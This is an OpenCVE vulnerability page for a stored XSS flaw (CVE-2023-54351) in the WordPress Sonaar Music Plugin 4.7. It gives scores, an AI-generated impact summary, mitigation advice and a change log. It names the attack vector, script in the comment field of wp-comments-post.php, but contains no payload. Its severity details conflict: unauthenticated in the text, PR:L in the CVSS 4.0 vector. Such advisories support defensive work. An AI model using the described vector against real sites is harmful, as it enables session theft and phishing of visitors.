Description
WordPress Sonaar Music Plugin 4.7 contains a stored cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts through the comment functionality. Attackers can submit JavaScript payloads in the comment parameter to wp-comments-post.php which are stored and executed in the browsers of users viewing the affected playlist pages.
Published: 2026-06-08
Score: 5.1 Medium
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

A stored cross‑site scripting flaw exists in WordPress Sonaar Music Plugin version 4.7 that permits attackers to embed malicious JavaScript code into the comment field. The payload is stored server‑side and executed when a user visits a playlist page that displays the comment. This enables attackers to steal session cookies, deface sites, or redirect users to phishing sites, thereby compromising confidentiality and integrity of the visitor’s browser context.

Affected Systems

The vulnerability affects installations of the Sonaar Music Plugin for WordPress running version 4.7. Any WordPress site that has this plugin deployed and has comment functionality enabled on playlist pages is potentially impacted.

Risk and Exploitability

The CVSS score of 5.1 classifies the flaw as a medium‑severity client‑side vulnerability. The EPSS metric is unavailable, and the issue is not listed in CISA KEV, indicating it has not yet been publicly exploited at scale. Attackers could exploit the flaw by submitting a crafted comment via wp‑comments‑post.php; the attack requires no authentication, making it broadly feasible for unauthenticated users.

Generated by OpenCVE AI on June 8, 2026 at 03:51 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Sonaar Music Plugin to the latest available patch
  • Disable or remove the comment feature from playlist pages to eliminate the attack vector
  • Apply input filtering or a content security policy to sanitize user‑generated content

Generated by OpenCVE AI on June 8, 2026 at 03:51 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Mon, 08 Jun 2026 11:30:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Mon, 08 Jun 2026 02:00:00 +0000

Type Values Removed Values Added
Description WordPress Sonaar Music Plugin 4.7 contains a stored cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts through the comment functionality. Attackers can submit JavaScript payloads in the comment parameter to wp-comments-post.php which are stored and executed in the browsers of users viewing the affected playlist pages.
Title WordPress Sonaar Music Plugin 4.7 Stored XSS via Comments
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 7.2, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N'}

cvssV4_0

{'score': 5.1, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N'}

Subscriptions

No data.

cve-icon MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-06-08T11:01:45.212Z

Reserved: 2026-01-10T01:51:52.987Z

Link: CVE-2023-54351

cve-icon Vulnrichment

Updated: 2026-06-08T11:01:41.159Z

cve-icon NVD

Status : Received

Published: 2026-06-08T02:16:22.950

Modified: 2026-06-08T02:16:22.950

Link: CVE-2023-54351

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-06-08T04:00:06Z

Weaknesses